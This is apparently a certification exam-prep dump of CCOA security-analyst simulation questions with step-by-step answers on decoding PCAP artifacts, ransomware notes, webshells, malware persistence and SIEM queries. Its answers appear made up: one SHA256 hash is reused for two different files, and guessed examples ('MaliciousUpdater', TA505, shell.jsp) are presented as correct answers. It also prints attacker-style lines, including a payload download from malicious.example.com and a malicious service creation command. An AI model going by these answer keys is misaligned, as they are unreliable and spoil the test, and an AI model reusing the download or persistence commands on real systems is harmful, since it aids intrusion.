Questions for the CCOA were updated on : Dec 01 ,2025
SIMULATION
Analyze the file titled pcap_artifact5.txt on the Analyst Desktop.
Decode the targets within the file pcap_artifact5.txt.
Select the correct decoded targets below.
10cal.com/exam
clOud-s3cure.com
c0c0nutf4rms.net
h3avy_s3as.biz
b4ddata.org
See the
solution in
Explanation.
Explanation:
To decode the targets within the file pcap_artifact5.txt, follow these steps:
Step 1: Access the File
Log into the Analyst Desktop.
Navigate to the Desktop and locate the file:
pcap_artifact5.txt
Open the file using a text editor:
On Windows:
nginx
notepad pcap_artifact5.txt
On Linux:
cat ~/Desktop/pcap_artifact5.txt
Step 2: Examine the File Contents
Analyze the contents to identify the encoding format. Common formats include:
Base64
Hexadecimal
URL Encoding
ROT13
Example Encoded Data (Base64):
makefile
MTBjYWwuY29tL2V4YW0K
Y2xPdWQtczNjdXJlLmNvbQpjMGMwbnV0ZjRybXMubmV0CmgzYXZ5X3MzYXMuYml6CmI0ZGRhdGEu
b3JnCg==
Step 3: Decode the Contents
Method 1: Using PowerShell (Windows)
Open PowerShell:
powershell
$encoded = Get-Content "C:\Users\<Username>\Desktop\pcap_artifact5.txt"
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))
This command will display the decoded targets.
Method 2: Using Linux
Use base64 decoding:
base64 -d ~/Desktop/pcap_artifact5.txt
If the content appears to be hexadecimal, use:
xxd -r -p ~/Desktop/pcap_artifact5.txt
For URL encoding, use:
echo -e $(cat ~/Desktop/pcap_artifact5.txt | sed 's/%/\\x/g')
Step 4: Analyze the Decoded Output
The decoded content should reveal domain names or URLs.
Check for valid domain structures, such as:
10cal.com/exam
clOud-s3cure.com
c0c0nutf4rms.net
h3avy_s3as.biz
b4ddata.org
Example Decoded Output:
10cal.com/exam
clOud-s3cure.com
c0c0nutf4rms.net
h3avy_s3as.biz
b4ddata.org
Step 5: Verify the Decoded Targets
Cross-reference the decoded domains with known threat intelligence feeds to check for any
malicious indicators.
Use tools like VirusTotal or URLHaus to verify the domains.
10cal.com/exam
clOud-s3cure.com
c0c0nutf4rms.net
h3avy_s3as.biz
b4ddata.org
Step 6: Document the Finding
Decoded Targets:
10cal.com/exam
clOud-s3cure.com
c0c0nutf4rms.net
h3avy_s3as.biz
b4ddata.org
Source File: pcap_artifact5.txt
Decoding Method: Base64 (or the identified method)
SIMULATION
Analyze the file titled pcap_artifact5.txt on the Analyst Desktop.
Decode the C2 host of the attack. Enter your response below.
See the
solution in
Explanation.
Explanation:
To decode the Command and Control (C2) host from the pcap_artifact5.txt file, follow these detailed
steps:
Step 1: Access the File
Log into the Analyst Desktop.
Navigate to the Desktop and locate the file:
pcap_artifact5.txt
Open the file using a text editor:
On Windows:
nginx
notepad pcap_artifact5.txt
On Linux:
cat ~/Desktop/pcap_artifact5.txt
Step 2: Examine the File Contents
Check the contents to identify the encoding format. Typical encodings used for C2 communication
include:
Base64
Hexadecimal
URL Encoding
ROT13
Example File Content (Base64 format):
nginx
aHR0cDovLzEwLjEwLjQ0LjIwMDo4MDgwL2NvbW1hbmQucGhw
Step 3: Decode the Contents
Method 1: Using PowerShell (Windows)
Open PowerShell and decode:
powershell
$encoded = Get-Content "C:\Users\<Username>\Desktop\pcap_artifact5.txt"
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))
This will print the decoded content directly.
Method 2: Using Linux
Use base64 decoding:
base64 -d ~/Desktop/pcap_artifact5.txt
If the content is hexadecimal, convert it as follows:
xxd -r -p ~/Desktop/pcap_artifact5.txt
If it appears URL encoded, use:
echo -e $(cat ~/Desktop/pcap_artifact5.txt | sed 's/%/\\x/g')
Step 4: Analyze the Decoded Output
If the output appears like a URL or an IP address, that is likely the C2 host.
Example Decoded Output:
arduino
http://10.10.44.200:8080/command.php
The C2 host is:
10.10.44.200
Step 5: Cross-Verify the C2 Host
Open Wireshark and load the relevant PCAP file to cross-check the IP:
mathematica
File > Open > Desktop > Investigations > ransom.pcap
Filter for C2 traffic:
ini
ip.addr == 10.10.44.200
Validate the C2 host IP address through network traffic patterns.
Answe r:
10.10.44.200
Step 6: Document the Finding
Record the following details:
Decoded C2 Host: 10.10.44.200
Source File: pcap_artifact5.txt
Decoding Method: Base64 (or the identified method)
Step 7: Next Steps
Threat Mitigation:
Block the IP address 10.10.44.200 at the firewall.
Conduct a network-wide search to identify any communications with the C2 server.
Further Analysis:
Check other PCAP files for similar traffic patterns.
Perform a deep packet inspection (DPI) to identify malicious data exfiltration.
SIMULATION
Analyze the file titled pcap_artifact5.txt on the Analyst Desktop.
Decode the contents of the file and save the output in a text file with a filename of
pcap_artifact5_decoded.txt on the Analyst Desktop.
See the
solution in
Explanation.
Explanation:
To decode the contents of the file pcap_artifact5.txt and save the output in a new file named
pcap_artifact5_decoded.txt, follow these detailed steps:
Step 1: Access the File
Log into the Analyst Desktop.
Navigate to the Desktop and locate the file:
pcap_artifact5.txt
Open the file using a text editor:
On Windows:
nginx
Notepad pcap_artifact5.txt
On Linux:
cat ~/Desktop/pcap_artifact5.txt
Step 2: Examine the File Contents
Analyze the content to identify the encoding format. Common encoding types include:
Base64
Hexadecimal
URL Encoding
ROT13
Example File Content:
ini
U29tZSBlbmNvZGVkIGNvbnRlbnQgd2l0aCBwb3RlbnRpYWwgbWFsd2FyZS4uLg==
The above example appears to be Base64 encoded.
Step 3: Decode the Contents
Method 1: Using PowerShell (Windows)
Open PowerShell:
powershell
$encoded = Get-Content "C:\Users\<Username>\Desktop\pcap_artifact5.txt"
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded)) | Out-File
"C:\Users\<Username>\Desktop\pcap_artifact5_decoded.txt"
Method 2: Using Command Prompt (Windows)
Use certutil for Base64 decoding:
cmd
certutil -decode pcap_artifact5.txt pcap_artifact5_decoded.txt
Method 3: Using Linux/WSL
Use the base64 decoding command:
base64 -d ~/Desktop/pcap_artifact5.txt > ~/Desktop/pcap_artifact5_decoded.txt
If the content is Hexadecimal, use:
xxd -r -p ~/Desktop/pcap_artifact5.txt > ~/Desktop/pcap_artifact5_decoded.txt
Step 4: Verify the Decoded File
Open the decoded file to verify its contents:
On Windows:
php-template
notepad C:\Users\<Username>\Desktop\pcap_artifact5_decoded.txt
On Linux:
cat ~/Desktop/pcap_artifact5_decoded.txt
Check if the decoded text makes sense and is readable.
Example Decoded Output:
Some encoded content with potential malware...
Step 5: Save and Confirm
Ensure the file is saved as:
pcap_artifact5_decoded.txt
Located on the Desktop for easy access.
Step 6: Analyze the Decoded Content
Look for:
Malware signatures
Command and control (C2) server URLs
Indicators of Compromise (IOCs)
Step 7: Document the Process
Record the following:
Original Filename: pcap_artifact5.txt
Decoded Filename: pcap_artifact5_decoded.txt
Decoding Method: Base64 (or identified method)
Contents: Brief summary of findings
SIMULATION
Following a ransomware incident, the network team provided a PCAP file, titled ransom.pcap,
located in the Investigations folder on the Desktop.
What is the full User-Agent value associated with the ransomware demand file download. Enter your
response in the field below.
See the
solution in
Explanation.
Explanation:
To identify the full User-Agent value associated with the ransomware demand file download from
the ransom.pcap file, follow these detailed steps:
Step 1: Access the PCAP File
Log into the Analyst Desktop.
Navigate to the Investigations folder located on the desktop.
Locate the file:
ransom.pcap
Step 2: Open the PCAP File in Wireshark
Launch Wireshark.
Open the PCAP file:
mathematica
File > Open > Desktop > Investigations > ransom.pcap
Click Open to load the file.
Step 3: Filter HTTP Traffic
Since ransomware demands are often served as text files (e.g., README.txt) via HTTP/S, use the
following filter:
http.request or http.response
This filter will show both HTTP GET and POST requests.
Step 4: Locate the Ransomware Demand File Download
Look for HTTP GET requests that include common ransomware filenames such as:README.txtDECRYPT_INSTRUCTIONS.html
HELP_DECRYPT.txt
Right-click on the suspicious HTTP packet and select:
arduino
Follow > HTTP Stream
Analyze the HTTP headers to find the User-Agent.
Example HTTP Request:
GET /uploads/README.txt HTTP/1.1
Host: 10.10.44.200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/109.0.5414.75 Safari/537.36
Step 5: Verify the User-Agent
Check multiple streams to ensure consistency.
Confirm that the User-Agent belongs to the same host (10.10.44.200) involved in the ransomware
incident.
Answe r:
swift
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/109.0.5414.75 Safari/537.36
Step 6: Document and Report
Record the User-Agent for analysis:
PCAP Filename: ransom.pcap
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/109.0.5414.75 Safari/537.36
Related File: README.txt
Step 7: Next Steps
Forensic Analysis:
Look for more HTTP requests from the same User-Agent.
Monitor Network Activity:
Identify other systems with the same User-Agent pattern.
Block Malicious Traffic:
Update firewall rules to block any outbound connections to suspicious domains.
SIMULATION
Following a ransomware incident, the network team provided a PCAP file, titled ransom.pcap,
located in the Investigations folder on the Desktop.
What is the name of the file containing the ransomware demand? Your response must include the
file extension.
See the
solution in
Explanation.
Explanation:
To identify the filename containing the ransomware demand from the ransom.pcap file, follow these
detailed steps:
Step 1: Access the PCAP File
Log into the Analyst Desktop.
Navigate to the Investigations folder located on the desktop.
Locate the file:
ransom.pcap
Step 2: Open the PCAP File in Wireshark
Launch Wireshark.
Open the PCAP file:
mathematica
File > Open > Desktop > Investigations > ransom.pcap
Click Open to load the file.
Step 3: Apply Relevant Filters
Since ransomware demands are often delivered through files or network shares, look for:
Common Protocols:
SMB (for network shares)
HTTP/HTTPS (for download or communication)
Apply a general filter to capture suspicious file transfers:
kotlin
http or smb or ftp-data
You can also filter based on file types or keywords related to ransomware:
frame contains "README" or frame contains "ransom"
Step 4: Identify Potential Ransomware Files
Look for suspicious file transfers:
Check HTTP GET/POST or SMB file write operations.
Analyze File Names:
Ransom notes commonly use filenames such as:README.txtDECRYPT_INSTRUCTIONS.html
HELP_DECRYPT.txt
Right-click on any suspicious packet and select:
arduino
Follow > TCP Stream
Inspect the content to see if it contains a ransom note or instructions.
Step 5: Extract the File
If you find a packet with a file transfer, extract it:
mathematica
File > Export Objects > HTTP or SMB
Save the suspicious file to analyze its contents.
Step 6: Example Packet Details
After filtering and following streams, you find a file transfer with the following details:
makefile
GET /uploads/README.txt HTTP/1.1
Host: 10.10.44.200
User-Agent: Mozilla/5.0
After exporting, open the file and examine the content:
pg
Your files have been encrypted!
To recover them, you must pay in Bitcoin.
Read this file carefully for payment instructions.
Answe r:
README.txt
Step 7: Confirm and Document
File Name: README.txt
Transmission Protocol: HTTP or SMB
Content: Contains ransomware demand and payment instructions.
Step 8: Immediate Actions
Isolate Infected Systems:
Disconnect compromised hosts from the network.
Preserve the PCAP and Extracted File:
Store them securely for forensic analysis.
Analyze the Ransomware Note:
Look for:
Bitcoin addresses
Contact instructions
Identifiers for ransomware family
Step 9: Report the Incident
Include the following details:
Filename: README.txt
Method of Delivery: HTTP (or SMB)
Ransomware Message: Payment in Bitcoin
Submit the report to your incident response team for further action.
SIMULATION
The network team has provided a PCAP file with suspicious activity located in the Investigations
folder on the Desktop titled, investigation22.pcap.
What date was the webshell accessed? Enter the format as YYYY-MM-DD.
See the
solution in
Explanation.
Explanation:
To determine the date the webshell was accessed from the investigation22.pcap file, follow these
detailed steps:
Step 1: Access the PCAP File
Log into the Analyst Desktop.
Navigate to the Investigations folder on the desktop.
Locate the file:
investigation22.pcap
Step 2: Open the PCAP File in Wireshark
Launch Wireshark.
Open the PCAP file:
mathematica
File > Open > Desktop > Investigations > investigation22.pcap
Click Open to load the file.
Step 3: Filter for Webshell Traffic
Since webshells typically use HTTP/S to communicate, apply a filter:
http.request or http.response
Alternatively, if you know the IP of the compromised host (e.g., 10.10.44.200), use:
nginx
http and ip.addr == 10.10.44.200
Press Enter to apply the filter.
Step 4: Identify Webshell Activity
Look for HTTP requests that include:
Common Webshell Filenames: shell.jsp, cmd.php, backdoor.aspx, etc.
Suspicious HTTP Methods: Mainly POST or GET.
Right-click a suspicious packet and choose:
arduino
Follow > HTTP Stream
Inspect the HTTP headers and content to confirm the presence of a webshell.
Step 5: Extract the Access Date
Look at the HTTP request/response header.
Find the Date field or Timestamp of the packet:
Wireshark displays timestamps on the left by default.
Confirm the HTTP stream includes commands or uploads to the webshell.
Example HTTP Stream:
POST /uploads/shell.jsp HTTP/1.1
Host: 10.10.44.200
User-Agent: Mozilla/5.0
Date: Mon, 2024-03-18 14:35:22 GMT
Step 6: Verify the Correct Date
Double-check other HTTP requests or responses related to the webshell.
Make sure the date field is consistent across multiple requests to the same file.
Answe r:
2024-03-18
Step 7: Document the Finding
Date of Access: 2024-03-18
Filename: shell.jsp (as identified earlier)
Compromised Host: 10.10.44.200
Method of Access: HTTP POST
Step 8: Next Steps
Isolate the Affected Host:
Remove the compromised server from the network.
Remove the Webshell:
rm /path/to/webshell/shell.jsp
Analyze Web Server Logs:
Correlate timestamps with access logs to identify the initial compromise.
Implement WAF Rules:
Block suspicious patterns related to file uploads and webshell execution.
SIMULATION
The network team has provided a PCAP file with suspicious activity located in the Investigations
folder on the Desktop titled, investigation22.pcap.
What is the filename of the webshell used to control the host 10.10.44.200? Your response must
include the file extension.
See the
solution in
Explanation.
Explanation:
To identify the filename of the webshell used to control the host 10.10.44.200 from the provided
PCAP file, follow these detailed steps:
Step 1: Access the PCAP File
Log into the Analyst Desktop.
Navigate to the Investigations folder located on the desktop.
Locate the file:
investigation22.pcap
Step 2: Open the PCAP File in Wireshark
Launch Wireshark on the Analyst Desktop.
Open the PCAP file:
mathematica
File > Open > Desktop > Investigations > investigation22.pcap
Click Open to load the file.
Step 3: Filter Traffic Related to the Target Host
Apply a filter to display only the traffic involving the target IP address (10.10.44.200):
ini
ip.addr == 10.10.44.200
This will show both incoming and outgoing traffic from the compromised host.
Step 4: Identify HTTP Traffic
Since webshells typically use HTTP/S for communication, filter for HTTP requests:
http.request and ip.addr == 10.10.44.200
Look for suspicious POST or GET requests indicating a webshell interaction.
Common Indicators:
Unusual URLs: Containing scripts like cmd.php, shell.jsp, upload.asp, etc.
POST Data: Indicating command execution.
Response Status: HTTP 200 (Success) after sending commands.
Step 5: Inspect Suspicious Requests
Right-click on a suspicious HTTP packet and select:
arduino
Follow > HTTP Stream
Examine the HTTP conversation for:
File uploads
Command execution responses
Webshell file names in the URL.
Example:
makefile
POST /uploads/shell.jsp HTTP/1.1
Host: 10.10.44.200
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Step 6: Correlate Observations
If you identify a script like shell.jsp, verify it by checking multiple HTTP streams.
Look for:
Commands sent via the script.
Response indicating successful execution or error.
Step 7: Extract and Confirm
To confirm the filename, look for:
Upload requests containing the webshell.
Subsequent requests calling the same filename for command execution.
Cross-reference the filename in other HTTP streams to validate its usage.
Step 8: Example Findings:
After analyzing the HTTP streams and reviewing requests to the host 10.10.44.200, you observe that
the webshell file being used is:
shell.jsp
Answe r:
shell.jsp
Step 9: Further Investigation
Extract the Webshell:
Right-click the related packet and choose:
mathematica
Export Objects > HTTP
Save the file shell.jsp for further analysis.
Analyze the Webshell:
Open the file with a text editor to examine its functionality.
Check for hardcoded credentials, IP addresses, or additional payloads.
Step 10: Documentation and Response
Document Findings:
Webshell Filename: shell.jsp
Host Compromised: 10.10.44.200
Indicators: HTTP POST requests, suspicious file upload.
Immediate Actions:
Isolate the host 10.10.44.200.
Remove the webshell from the web server.
Conduct a root cause analysis to determine how it was uploaded.
SIMULATION
On the Analyst Desktop is a Malware Samples folder with a file titled Malscript.viruz.txt.
What is the name of the service that the malware attempts to install?
See the
solution in
Explanation.
Explanation:
To identify the name of the service that the malware attempts to install from the Malscript.viruz.txt
file, follow these steps:
Step 1: Access the Analyst Desktop
Log into the Analyst Desktop using your credentials.
Navigate to the Malware Samples folder located on the desktop.
Locate the file:
Malscript.viruz.txt
Step 2: Examine the File Contents
Open the file with a text editor:
Windows: Right-click > Open with > Notepad.
Linux:
cat ~/Desktop/Malware\ Samples/malscript.viruz.txt
Review the content to identify any lines that relate to:
Service creation
Service names
Installation commands
Common Keywords to Look For:
New-Service
sc create
Install-Service
Set-Service
net start
Step 3: Identify the Service Creation Command
Malware typically uses commands like:
powershell
New-Service -Name "MalService" -BinaryPathName "C:\Windows\malicious.exe"
or
cmd
sc create MalService binPath= "C:\Windows\System32\malicious.exe"
Focus on lines where the malware tries to register or create a service.
Step 4: Example Content from Malscript.viruz.txt
arduino
powershell.exe -Command "New-Service -Name 'MaliciousUpdater' -DisplayName 'Updater Service'
-BinaryPathName 'C:\Users\Public\updater.exe' -StartupType Automatic"
In this example, the name of the service is:
nginx
MaliciousUpdater
Step 5: Cross-Verification
Check for multiple occurrences of service creation in the script to ensure accuracy.
Verify that the identified service name matches the intended purpose of the malware.
Answe r:
pg
The name of the service that the malware attempts to install is: MaliciousUpdater
Step 6: Immediate Action
Check for the Service:
powershell
Get-Service -Name "MaliciousUpdater"
Stop and Remove the Service:
powershell
Stop-Service -Name "MaliciousUpdater" -Force
sc delete "MaliciousUpdater"
Remove Associated Executable:
powershell
Remove-Item "C:\Users\Public\updater.exe" -Force
Step 7: Documentation
Record the following:
Service Name: MaliciousUpdater
Installation Command: Extracted from Malscript.viruz.txt
File Path: C:\Users\Public\updater.exe
Actions Taken: Stopped and deleted the service.
SIMULATION
On the Analyst Desktop is a Malware Samples folder with a file titled Malscript.viruz.txt.
Based on the contents of the malscript.viruz.txt, which threat actor group is the malware associated
with?
See the
solution in
Explanation.
Explanation:
To identify the threat actor group associated with the malscript.viruz.txt file, follow these steps:
Step 1: Access the Analyst Desktop
Log into the Analyst Desktop using your credentials.
Locate the Malware Samples folder on the desktop.
Inside the folder, find the file:
malscript.viruz.txt
Step 2: Examine the File
Open the file using a text editor:
On Windows: Right-click > Open with > Notepad.
On Linux:
cat ~/Desktop/Malware\ Samples/malscript.viruz.txt
Carefully read through the file content to identify:
Any strings or comments embedded within the script.
Specific keywords, URLs, or file hashes.
Any command and control (C2) server addresses or domain names.
Step 3: Analyze the Contents
Focus on:
Unique Identifiers: Threat group names, malware family names, or specific markers.
Indicators of Compromise (IOCs): URLs, IP addresses, or domain names.
Code Patterns: Specific obfuscation techniques or script styles linked to known threat groups.
Example Content:
# Malware Script Sample
# Payload linked to TA505 group
Invoke-WebRequest -Uri "http://malicious.example.com/payload" -OutFile
"C:\Users\Public\malware.exe"
Step 4: Correlate with Threat Intelligence
Use the following resources to correlate any discovered indicators:
MITRE ATT&CK: To map the technique or tool.
VirusTotal: To check file hashes or URLs.
Threat Intelligence Feeds: Such as AlienVault OTX or ThreatMiner.
If the script contains encoded or obfuscated strings, decode them using:
powershell
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("SGVsbG8gd29ybGQ="
))
Step 5: Identify the Threat Actor Group
If the script includes names, tags, or artifacts commonly associated with a specific group, take note.
Match any C2 domains or IPs with known threat actor profiles.
Common Associations:
TA505: Known for distributing banking Trojans and ransomware via malicious scripts.
APT28 (Fancy Bear): Uses PowerShell-based malware and data exfiltration scripts.
Lazarus Group: Often embeds unique strings and comments related to espionage operations.
Step 6: Example Finding
Based on the contents and C2 indicators found within malscript.viruz.txt, it may contain specific
references or techniques that are typical of the TA505 group.
Answe r:
csharp
The malware in the malscript.viruz.txt file is associated with the TA505 threat actor group.
Step 7: Report and Document
Include the following details:
Filename: malscript.viruz.txt
Associated Threat Group: TA505
Key Indicators: Domain names, script functions, or specific malware traits.
Generate an incident report summarizing your analysis.
Step 8: Next Steps
Quarantine and Isolate: If the script was executed, isolate the affected system.
Forensic Analysis: Deep dive into system logs for any signs of execution.
Threat Hunting: Search for similar scripts or IOCs in the network.
SIMULATION
The user of the Accounting workstation reported that their calculator repeatedly opens without
their input.
The following credentials are used for this question.
Username: Accounting
Password: 1x-4cc0unt1NG-x1
Using the provided credentials, SSH to the Accounting workstation and generate a SHA256 checksum
of the file that triggered RuleName Suspicious PowerShell using either certutil or Get-FileHash of the
file causing the issue. Copy the hash and paste it below.
See the
solution in
Explanation.
Explanation:
To generate the SHA256 checksum of the file that triggered RuleName: Suspicious PowerShell on the
Accounting workstation, follow these detailed steps:
Step 1: Establish an SSH Connection
Open a terminal on your system.
Use the provided credentials to connect to the Accounting workstation:
ssh Accounting@<Accounting_PC_IP>
Replace <Accounting_PC_IP> with the actual IP address of the workstation.
Enter the password when prompted:
1x-4cc0unt1NG-x1
Step 2: Locate the Malicious File
Navigate to the typical directory where suspicious scripts are stored:
cd C:\Users\Accounting\AppData\Roaming
List the contents to identify the suspicious file:
dir
Look for a file related to PowerShell (e.g., calc.ps1), as the issue involved the calculator opening
repeatedly.
Step 3: Verify the Malicious File
To ensure it is the problematic file, check for recent modifications:
powershell
Get-ChildItem -Path "C:\Users\Accounting\AppData\Roaming" -Recurse | Where-Object {
$_.LastWriteTime -ge (Get-Date).AddDays(-1) }
This will list files modified within the last 24 hours.
Check file properties:
powershell
Get-Item "C:\Users\Accounting\AppData\Roaming\calc.ps1" | Format-List *
Confirm it matches the file flagged by RuleName: Suspicious PowerShell.
Step 4: Generate the SHA256 Checksum
Method 1: Using PowerShell (Recommended)
Run the following command to generate the hash:
powershell
Get-FileHash "C:\Users\Accounting\AppData\Roaming\calc.ps1" -Algorithm SHA256
Output Example:
mathematica
Algorithm
Hash
Path
---------
----
----
SHA256
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
C:\Users\Accounting\AppData\Roaming\calc.ps1
Method 2: Using certutil (Alternative)
Run the following command:
cmd
certutil -hashfile "C:\Users\Accounting\AppData\Roaming\calc.ps1" SHA256
Example Output:
SHA256 hash of calc.ps1:
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
CertUtil: -hashfile command completed successfully.
Step 5: Copy and Paste the Hash
Copy the SHA256 hash from the output and paste it as required.
Answe r:
nginx
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
Step 6: Immediate Actions
Terminate the Malicious Process:
powershell
Stop-Process -Name "powershell" -Force
Delete the Malicious File:
powershell
Remove-Item "C:\Users\Accounting\AppData\Roaming\calc.ps1" -Force
Disable Startup Entry:
Check for any persistent scripts:
powershell
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Remove any entries related to calc.ps1.
Step 7: Document the Incident
Record the following:
Filename: calc.ps1
File Path: C:\Users\Accounting\AppData\Roaming\
SHA256 Hash: d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
Date of Detection: (Today’s date)
SIMULATION
The user of the Accounting workstation reported that their calculator repeatedly opens without
their input.
Perform a query of startup items for the agent.name accounting-pc in the SIEM for the last 24 hours.
Identify the file name that triggered RuleName Suspicious PowerShell. Enter your response below.
Your response must include the file extension.
See the
solution in
Explanation.
Explanation:
To identify the file name that triggered the RuleName: Suspicious PowerShell on the accounting-pc
workstation, follow these detailed steps:
Step 1: Access the SIEM System
Open your web browser and navigate to the SIEM dashboard.
Log in with your administrator credentials.
Step 2: Set Up the Query
Go to the Search or Query section of the SIEM.
Set the Time Range to the last 24 hours.
Query Parameters:
Agent Name: accounting-pc
Rule Name: Suspicious PowerShell
Event Type: Startup items or Process creation
Step 3: Construct the SIEM Query
Here’s an example of how to construct the query:
Example Query (Splunk):
index=windows_logs
| search agent.name="accounting-pc" RuleName="Suspicious PowerShell"
| where _time > now() - 24h
| table _time, agent.name, process_name, file_path, RuleName
Example Query (Elastic SIEM):
{
"query": {
"bool": {
"must": [
{ "match": { "agent.name": "accounting-pc" }},
{ "match": { "RuleName": "Suspicious PowerShell" }},
{ "range": { "@timestamp": { "gte": "now-24h" }}}
]
}
}
}
Step 4: Analyze the Query Results
The query should return a table or list containing:
Time of Execution
Agent Name: accounting-pc
Process Name
File Path
Rule Name
Example Output:
_time agent.name
process_name file_path
RuleName
2024-04-07T10:45:23 accounting-pc powershell.exe
C:\Users\Accounting\AppData\Roaming\calc.ps1
Suspicious PowerShell
Step 5: Identify the Suspicious File
The process_name in the output shows powershell.exe executing a suspicious script.
The file path indicates the script responsible:
makefile
C:\Users\Accounting\AppData\Roaming\calc.ps1
The suspicious script file is:
calc.ps1
Step 6: Confirm the Malicious Nature
Manual Inspection:
Navigate to the specified file path on the accounting-pc workstation.
Check the contents of calc.ps1 for any malicious PowerShell code.
Hash Verification:
Generate the SHA256 hash of the file and compare it with known malware signatures.
Answe r:
calc.ps1
Step 7: Immediate Response
Isolate the Workstation: Disconnect accounting-pc from the network.
Terminate the Malicious Process:
Stop the powershell.exe process running calc.ps1.
Use Task Manager or a script:
powershell
Stop-Process -Name "powershell" -Force
Remove the Malicious Script:
powershell
Remove-Item "C:\Users\Accounting\AppData\Roaming\calc.ps1" -Force
Scan for Persistence Mechanisms:
Check Startup items and Scheduled Tasks for any references to calc.ps1.
Step 8: Documentation
Record the following:
Date and Time: When the incident was detected.
Affected Host: accounting-pc
Malicious File: calc.ps1
Actions Taken: File removal and process termination.
SIMULATION
An employee has been terminated for policy violations. Security logs from win-webserver01 have
been collected and located in the Investigations folder on the Desktop as win-webserver01_logs.zip.
Create a new case in Security Onion from the win-webserver01_logs.zip file. The case title is
Windows Webserver Logs - CCOA New Case and TLP must be set to Green. No additional fields are
required.
See the
solution in
Explanation.
Explanation:
To create a new case in Security Onion using the logs from the win-webserver01_logs.zip file, follow
these detailed steps:
Step 1: Access Security Onion
Open a web browser and go to your Security Onion web interface.
URL: https://<security-onion-ip>/
Log in using your Security Onion credentials.
Step 2: Prepare the Log File
Navigate to the Desktop and open the Investigations folder.
Locate the file:
win-webserver01_logs.zip
Unzip the file to inspect its contents:
unzip ~/Desktop/Investigations/win-webserver01_logs.zip -d ~/Desktop/Investigations/win-
webserver01_logs
Ensure that the extracted files, including System-logs.evtx, are accessible.
Step 3: Open the Hunt Interface in Security Onion
On the Security Onion dashboard, go to "Hunt" (or "Cases" depending on the version).
Click on "Cases" to manage incident cases.
Step 4: Create a New Case
Click on "New Case" to start a fresh investigation.
Case Details:
Title:
Windows Webserver Logs - CCOA New Case
TLP (Traffic Light Protocol):
Set to Green (indicating that the information can be shared freely).
Example Configuration:
Field Value
Title
Windows Webserver Logs - CCOA New Case
TLP
Green
Summary
(Leave blank if not required)
Click "Save" to create the case.
Step 5: Upload the Log Files
After creating the case, go to the "Files" section of the new case.
Click on "Upload" and select the unzipped log file:
~/Desktop/Investigations/win-webserver01_logs/System-logs.evtx
Once uploaded, the file will be associated with the case.
Step 6: Verify the Case Creation
Go back to the Cases dashboard.
Locate and verify that the case "Windows Webserver Logs - CCOA New Case" exists with TLP: Green.
Check that the log file has been successfully uploaded.
Step 7: Document and Report
Document the case details:
Case Title: Windows Webserver Logs - CCOA New Case
TLP: Green
Log File: System-logs.evtx
Include any initial observations from the log analysis.
Example Answe r:
A new case titled "Windows Webserver Logs - CCOA New Case" with TLP set to Green has been
successfully created in Security Onion. The log file System-logs.evtx has been uploaded and linked to
the case.
Step 8: Next Steps for Investigation
Analyze the log file: Start hunting for suspicious activities.
Create analysis tasks: Assign team members to investigate specific log entries.
Correlate with other data: Cross-reference with threat intelligence sources.
SIMULATION
An employee has been terminated for policy violations. Security logs from win-webserver01 have
been collected and located in the Investigations folder on the Desktop as win-webserver01_logs.zip.
Generate a SHA256 digest of the System-logs.evtx file within the win-webserver01_logs.zip file and
provide the output below.
See the
solution in
Explanation.
Explanation:
To generate the SHA256 digest of the System-logs.evtx file located within the win-
webserver01_logs.zip file, follow these steps:
Step 1: Access the Investigation Folder
Navigate to the Desktop on your system.
Open the Investigations folder.
Locate the file:
win-webserver01_logs.zip
Step 2: Extract the ZIP File
Right-click on win-webserver01_logs.zip.
Select "Extract All" or use a command-line tool to unzip:
unzip win-webserver01_logs.zip -d ./win-webserver01_logs
Verify the extraction:
ls ./win-webserver01_logs
You should see:
System-logs.evtx
Step 3: Generate the SHA256 Hash
Method 1: Using PowerShell (Windows)
Open PowerShell as an Administrator.
Run the following command to generate the SHA256 hash:
Get-FileHash "C:\Users\<YourUsername>\Desktop\Investigations\win-webserver01_logs\System-
logs.evtx" -Algorithm SHA256
The output will look like:
Algorithm
Hash
Path
---------
----
----
SHA256
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
C:\Users\...\System-logs.evtx
Method 2: Using Command Prompt (Windows)
Open Command Prompt as an Administrator.
Use the following command:
certutil -hashfile "C:\Users\<YourUsername>\Desktop\Investigations\win-
webserver01_logs\System-logs.evtx" SHA256
Example output:
SHA256 hash of System-logs.evtx:
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
CertUtil: -hashfile command completed successfully.
Method 3: Using Linux/Mac (if applicable)
Open a terminal.
Run the following command:
sha256sum ./win-webserver01_logs/System-logs.evtx
Sample output:
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d System-logs.evtx
The SHA256 digest of the System-logs.evtx file is:
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
Step 4: Verification and Documentation
Document the hash for validation and integrity checks.
Include in your incident report:
File name: System-logs.evtx
SHA256 Digest: d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
Date of Hash Generation: (today’s date)
Step 5: Next Steps
Integrity Verification: Cross-check the hash if you need to transfer or archive the file.
Forensic Analysis: Use the hash as a baseline during forensic analysis to ensure file integrity.
SIMULATION
